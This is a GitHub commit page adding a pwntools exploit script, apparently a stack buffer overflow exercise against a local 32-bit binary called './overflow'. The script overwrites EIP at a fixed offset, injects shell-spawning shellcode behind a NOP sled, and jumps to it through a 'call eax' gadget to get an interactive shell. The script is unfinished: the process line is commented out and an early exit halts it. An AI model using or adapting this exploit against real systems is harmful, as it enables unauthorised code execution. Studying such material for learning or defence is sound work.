Permalink
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Showing
1 changed file
with
66 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,66 @@ | ||
from pwn import * | ||
|
||
context(os='linux', arch='i386') | ||
context.log_level = "debug" | ||
|
||
# OFFSET to Control EIP | ||
OFFSET = 316 | ||
|
||
TARGET = "./overflow" | ||
|
||
evil = shellcraft.sh() | ||
|
||
#print(evil) | ||
|
||
#import sys | ||
#sys.exit(0) | ||
|
||
# Load the Binary as a process | ||
#proc = process(TARGET) | ||
|
||
# Pause the Program to allow us to connect with GDB | ||
pause() | ||
|
||
# And Read the Data from it. | ||
out = proc.readuntil("Stack\n") | ||
print("First Line {0}".format(out)) | ||
|
||
# Stage 1: Find the offset. | ||
# Send our payload to the Target | ||
#proc.writeline(cyclic(44)) | ||
|
||
# Stage 2: Confirm we have control of the Instruction pointer. | ||
payload = b"A" | ||
payload += b"B"*40 | ||
payload += b"ZZZZ" | ||
#payload += b"\x90"*(OFFSET-4) | ||
#payload += b"CBBC" | ||
proc.writeline(payload) | ||
|
||
import sys | ||
sys.exit(0) | ||
|
||
#EAX ADDRESS IS 0xffffcdd0 | ||
#EAX_ADDR = 0xffffcdd0 | ||
|
||
#With Ret 2 Reg we can use call EAX | ||
# find this with $objdump -D | grep call | grep eax | ||
|
||
CALL_EAX = 0x8049019 | ||
|
||
payload = b"\x90"*10 | ||
payload += asm(evil) | ||
payload += b"\x90"*(OFFSET - len(payload)) | ||
#payload += b"BBBB" | ||
#payload += p32(EAX_ADDR) | ||
payload += p32(CALL_EAX) | ||
|
||
|
||
print("SANITY CHECK ON PAYLOAD LEN {0}".format(len(payload))) | ||
proc.writeline(payload) | ||
|
||
# Get the response back | ||
proc.interactive() | ||
#out =proc.read() | ||
|
||
print("Second Line {0}".format(out)) |